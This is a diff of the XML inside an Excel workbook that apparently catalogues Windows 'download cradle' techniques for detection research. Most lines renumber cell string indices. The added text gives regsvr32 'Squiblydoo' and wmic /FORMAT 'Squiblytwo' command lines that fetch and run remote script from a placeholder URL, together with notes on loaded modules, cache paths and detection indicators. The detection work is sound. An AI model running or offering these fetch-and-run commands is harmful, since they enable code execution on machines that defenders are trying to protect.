+        <v>100</v>
       </c>
       <c r="B4" s="27" t="s">
-        <v>142</v>
+        <v>141</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>20</v>
       </c>
       <c r="D4" s="27" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>76</v>
+        <v>75</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>76</v>
+        <v>75</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>76</v>
+        <v>75</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="112">
@@ -13751,7 +13751,7 @@
         <v>7</v>
       </c>
       <c r="B6" s="17" t="s">
-        <v>146</v>
+        <v>145</v>
       </c>
       <c r="C6" s="17" t="s">
         <v>10</v>
@@ -13765,35 +13765,35 @@
         <v>8</v>
       </c>
       <c r="B7" s="27" t="s">
+        <v>190</v>
+      </c>
+      <c r="C7" s="50" t="s">
         <v>191</v>
       </c>
-      <c r="C7" s="50" t="s">
-        <v>192</v>
-      </c>
       <c r="D7" s="27" t="s">
-        <v>207</v>
+        <v>206</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="246">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="30" t="s">
-        <v>147</v>
+        <v>146</v>
       </c>
       <c r="C8" s="30" t="s">
-        <v>109</v>
+        <v>108</v>
       </c>
       <c r="D8" s="30" t="s">
-        <v>188</v>
+        <v>187</v>
       </c>
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="28" t="s">
-        <v>148</v>
+        <v>147</v>
       </c>
       <c r="C9" s="28" t="s">
         <v>13</v>
@@ -13832,13 +13832,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="96">
@@ -13846,13 +13846,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>214</v>
+        <v>213</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>214</v>
+        <v>213</v>
       </c>
       <c r="D2" s="10" t="s">
-        <v>214</v>
+        <v>213</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="32">
@@ -13866,35 +13866,35 @@
         <v>3</v>
       </c>
       <c r="D3" s="45" t="s">
-        <v>86</v>
+        <v>85</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>157</v>
+        <v>156</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="27" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
+        <v>72</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>73</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>74</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -13916,41 +13916,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="7" t="s">
+        <v>157</v>
+      </c>
+      <c r="C7" s="7" t="s">
         <v>158</v>
       </c>
-      <c r="C7" s="7" t="s">
-        <v>159</v>
-      </c>
       <c r="D7" s="55" t="s">
-        <v>189</v>
+        <v>188</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="32">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="7" t="s">
-        <v>190</v>
+        <v>189</v>
       </c>
       <c r="C9" s="7" t="s">
-        <v>190</v>
+        <v>189</v>
       </c>
       <c r="D9" s="7" t="s">
-        <v>190</v>
+        <v>189</v>
       </c>
     </row>
   </sheetData>
@@ -13983,13 +13983,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="112">
@@ -14017,35 +14017,35 @@
         <v>4</v>
       </c>
       <c r="D3" s="45" t="s">
-        <v>86</v>
+        <v>85</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="32" customHeight="1">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>157</v>
+        <v>156</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="27" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
+        <v>72</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>73</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>74</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -14067,41 +14067,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
-        <v>165</v>
+        <v>164</v>
       </c>
       <c r="C7" s="7" t="s">
-        <v>164</v>
+        <v>163</v>
       </c>
       <c r="D7" s="35" t="s">
-        <v>199</v>
+        <v>198</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="64">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="7" t="s">
-        <v>57</v>
+        <v>56</v>
       </c>
       <c r="C9" s="7" t="s">
-        <v>57</v>
+        <v>56</v>
       </c>
       <c r="D9" s="7" t="s">
-        <v>57</v>
+        <v>56</v>
       </c>
     </row>
   </sheetData>

--- a/other/DownloadCradle/DownloadCradle.xlsx
+++ b/other/DownloadCradle/DownloadCradle.xlsx
@@ -9114,11 +9114,6 @@
     </r>
   </si>
   <si>
-    <t>Squiglytwo - wmic.exe as a download cradle (not specifically powershell)
-wmic.exe &lt;command&gt; /FORMAT:$Url
-e.g wmic.exe os get /FORMAT:"http://domain.com/test.xsl"</t>
-  </si>
-  <si>
     <t>GET:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)</t>
   </si>
   <si>
@@ -9468,6 +9463,63 @@
         <b/>
         <sz val="12"/>
         <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>Squiblydoo - regsvr32.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> as a download cradle (not specifically powershell)
+regsvr32.exe /s /u /i:$Url scrobj.dll
+Proxy aware</t>
+    </r>
+  </si>
+  <si>
+    <t>Squiblydoo - regsvr32.exe as a download cradle (not specifically powershell)
+regsvr32.exe /s /u /i:$Url scrobj.dll</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>Squiblytwo - wmic.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> as a download cradle (not specifically powershell)
+cmd /d wmic.exe os get /FORMAT:"$Url"
+Proxy aware</t>
+    </r>
+  </si>
+  <si>
+    <t>Squiblytwo - wmic.exe as a download cradle (not specifically powershell)
+wmic.exe &lt;command&gt; /FORMAT:$Url
+e.g wmic.exe os get /FORMAT:"http://domain.com/test.xsl"</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
       <t>wmic.exe loads additional modules:</t>
@@ -9485,145 +9537,7 @@
     </r>
     <r>
       <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
-Application Experience Program Cache - C:\Windows\System32\aepic.dll
-Client Interface - C:\ProgramData\Microsoft\Windows Defender\Platform\4.14.17613.18039-0\MpClient.dll
-Cloud API user mode API - C:\Windows\System32\cldapi.dll
-Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
-Crypto API32 - C:\Windows\System32\crypt32.dll
-Crypto Network Related API - C:\Windows\System32\cryptnet.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Data Protection API - C:\Windows\System32\dpapi.dll
-EDP util - C:\Windows\System32\edputil.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-Filter Library - C:\Windows\System32\fltLib.dll
-Group Policy Client API - C:\Windows\System32\gpapi.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Internet Extensions for Win32 - C:\Windows\System32\wininet.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
-Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
-Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
-Microsoft Property System - C:\Windows\System32\propsys.dll
-Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
-Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Microsoft ® JScript - C:\Windows\System32\jscript.dll
-Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
-NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
-OneCoreUAP Common Proxy Stub - C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-Software Licensing Client Dll - C:\Windows\System32\slc.dll
-Software Licensing Client Dll - C:\Windows\System32\sppc.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Web Transfer Protocols API - C:\Windows\System32\webio.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
-Windows NT MARTA provider - C:\Windows\System32\ntmarta.dll
-Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
-Windows Shell Common Dll - C:\Windows\System32\shell32.dll
-Windows StateRepository Proxy/Stub Server - C:\Windows\System32\Windows.StateRepositoryPS.dll</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>wmic.exe loads additional modules:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="9"/>
+        <sz val="10"/>
         <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
@@ -9645,21 +9559,22 @@
     <r>
       <rPr>
         <b/>
-        <sz val="9"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Microsoft ® JScript - C:\Windows\System32\jscript.dll
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Microsoft ® JScript - C:\Windows\System32\jscript.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
 Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="9"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+NT Layer DLL - C:\Windows\System32\ntdll.dll
 Network Explorer - C:\Windows\System32\networkexplorer.dll
 On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
 Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
@@ -9672,7 +9587,7 @@
     <r>
       <rPr>
         <b/>
-        <sz val="9"/>
+        <sz val="10"/>
         <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
@@ -9680,14 +9595,31 @@
     </r>
     <r>
       <rPr>
-        <sz val="9"/>
+        <sz val="10"/>
         <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
       <t xml:space="preserve">
 Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
-Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
-Windows Setup API - C:\Windows\System32\setupapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows Setup API - C:\Windows\System32\setupapi.dll
 Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
     </r>
   </si>
@@ -9819,7 +9751,24 @@
       </rPr>
       <t xml:space="preserve">
 Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
-Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
 Windows Setup API - C:\Windows\System32\setupapi.dll
 Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
     </r>
@@ -9830,6 +9779,127 @@
         <b/>
         <sz val="12"/>
         <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>wmic.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
+Application Compatibility Client Library - C:\Windows\System32\apphelp.dll
+Common Controls Library - C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8\comctl32.dll
+Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
+Crypto API32 - C:\Windows\System32\crypt32.dll
+Crypto Network Related API - C:\Windows\System32\cryptnet.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Group Policy Client API - C:\Windows\System32\gpapi.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Microsoft Property System - C:\Windows\System32\propsys.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Microsoft ® JScript - C:\Windows\System32\jscript.dll
+Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+Network Explorer - C:\Windows\System32\networkexplorer.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Security Support Provider Interface - C:\Windows\System32\secur32.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Version Checking and File Installation Libraries - C:\Windows\System32\version.dll
+Win32 LDAP API DLL - C:\Windows\System32\Wldap32.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows Setup API - C:\Windows\System32\setupapi.dll
+Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Control for whitelist ran:
+wmic /node:192.168.7.159 /User:Administrator /Password:&lt;Password&gt; os get
+wmic os get</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
         <rFont val="Calibri"/>
         <family val="2"/>
       </rPr>
@@ -9843,62 +9913,35 @@
         <family val="2"/>
         <scheme val="minor"/>
       </rPr>
-      <t xml:space="preserve"> Best detection via commandline and process chains
-wmic.exe connecting out to the internet is a good indicator.
-Wmic.exe also loads wininet.dll and winhttp.dll across all versions I tested.</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-      </rPr>
-      <t>Squiblydoo - regsvr32.exe</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve"> as a download cradle (not specifically powershell)
-regsvr32.exe /s /u /i:$Url scrobj.dll
-Proxy aware</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-      </rPr>
-      <t>Squiblydoo - wmic.exe</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve"> as a download cradle (not specifically powershell)
-cmd /d wmic.exe os get /FORMAT:"$Url"
-Proxy aware</t>
-    </r>
-  </si>
-  <si>
-    <t>Squiblydoo - regsvr32.exe as a download cradle (not specifically powershell)
-regsvr32.exe /s /u /i:$Url scrobj.dll</t>
+      <t xml:space="preserve"> Best detection via commandline and process chains or wmic.exe connecting out to the internet.
+Wmic.exe process with "*format*" as command line
+Wmic.exe loading jscript.dll - Wmic.exe also loads winhttp.dll across all versions I tested. I found  vbscript.dll loaded in my control.
+wmic.exe writes:
+C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
+C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Network:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> User-Agent is very noisy so traditional content based detection appears most appropriate.</t>
+    </r>
   </si>
 </sst>
 </file>
@@ -12209,13 +12252,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="43" t="s">
-        <v>242</v>
+        <v>236</v>
       </c>
       <c r="C2" s="43" t="s">
-        <v>242</v>
+        <v>236</v>
       </c>
       <c r="D2" s="43" t="s">
-        <v>242</v>
+        <v>236</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="20" customHeight="1">
@@ -12223,10 +12266,10 @@
         <v>2</v>
       </c>
       <c r="B3" s="47" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
       <c r="C3" s="47" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
       <c r="D3" s="42" t="s">
         <v>88</v>
@@ -12279,7 +12322,7 @@
         <v>8</v>
       </c>
       <c r="B7" s="4" t="s">
-        <v>235</v>
+        <v>234</v>
       </c>
       <c r="C7" s="47" t="s">
         <v>128</v>
@@ -12326,9 +12369,9 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:E9"/>
   <sheetViews>
-    <sheetView topLeftCell="A2" workbookViewId="0">
+    <sheetView topLeftCell="A6" workbookViewId="0">
       <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight"/>
+      <selection pane="topRight" activeCell="C8" sqref="C8"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -12358,13 +12401,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="43" t="s">
-        <v>224</v>
+        <v>238</v>
       </c>
       <c r="C2" s="43" t="s">
-        <v>224</v>
+        <v>238</v>
       </c>
       <c r="D2" s="43" t="s">
-        <v>224</v>
+        <v>238</v>
       </c>
     </row>
     <row r="3" spans="1:5" ht="20" customHeight="1">
@@ -12372,10 +12415,10 @@
         <v>2</v>
       </c>
       <c r="B3" s="47" t="s">
-        <v>233</v>
+        <v>232</v>
       </c>
       <c r="C3" s="47" t="s">
-        <v>225</v>
+        <v>224</v>
       </c>
       <c r="D3" s="42" t="s">
         <v>88</v>
@@ -12400,13 +12443,13 @@
         <v>72</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
     </row>
     <row r="6" spans="1:5" ht="112">
@@ -12414,13 +12457,13 @@
         <v>7</v>
       </c>
       <c r="B6" s="43" t="s">
-        <v>229</v>
+        <v>228</v>
       </c>
       <c r="C6" s="43" t="s">
-        <v>229</v>
+        <v>228</v>
       </c>
       <c r="D6" s="43" t="s">
-        <v>229</v>
+        <v>228</v>
       </c>
     </row>
     <row r="7" spans="1:5" ht="409" customHeight="1">
@@ -12428,16 +12471,16 @@
         <v>8</v>
       </c>
       <c r="B7" s="47" t="s">
-        <v>236</v>
+        <v>239</v>
       </c>
       <c r="C7" s="47" t="s">
-        <v>237</v>
+        <v>241</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>238</v>
+        <v>240</v>
       </c>
       <c r="E7" t="s">
-        <v>230</v>
+        <v>229</v>
       </c>
     </row>
     <row r="8" spans="1:5" ht="80">
@@ -12445,13 +12488,13 @@
         <v>65</v>
       </c>
       <c r="B8" s="43" t="s">
+        <v>230</v>
+      </c>
+      <c r="C8" s="43" t="s">
+        <v>227</v>
+      </c>
+      <c r="D8" s="43" t="s">
         <v>231</v>
-      </c>
-      <c r="C8" s="43" t="s">
-        <v>228</v>
-      </c>
-      <c r="D8" s="43" t="s">
-        <v>232</v>
       </c>
     </row>
     <row r="9" spans="1:5">
@@ -12629,7 +12672,7 @@
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <pane ySplit="1" topLeftCell="A23" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="A30" sqref="A30"/>
+      <selection pane="bottomLeft" activeCell="B33" sqref="B33"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -12825,7 +12868,7 @@
     </row>
     <row r="28" spans="1:2" ht="96">
       <c r="A28" s="36" t="s">
-        <v>234</v>
+        <v>233</v>
       </c>
       <c r="B28" s="36" t="s">
         <v>124</v>
@@ -12837,7 +12880,7 @@
     </row>
     <row r="30" spans="1:2" ht="48">
       <c r="A30" s="36" t="s">
-        <v>240</v>
+        <v>235</v>
       </c>
       <c r="B30" s="36" t="s">
         <v>92</v>
@@ -12847,12 +12890,12 @@
       <c r="A31" s="37"/>
       <c r="B31" s="38"/>
     </row>
-    <row r="32" spans="1:2" ht="48">
+    <row r="32" spans="1:2" ht="144">
       <c r="A32" s="36" t="s">
-        <v>241</v>
+        <v>237</v>
       </c>
       <c r="B32" s="36" t="s">
-        <v>239</v>
+        <v>242</v>
       </c>
     </row>
     <row r="33" spans="1:2" ht="7" customHeight="1">
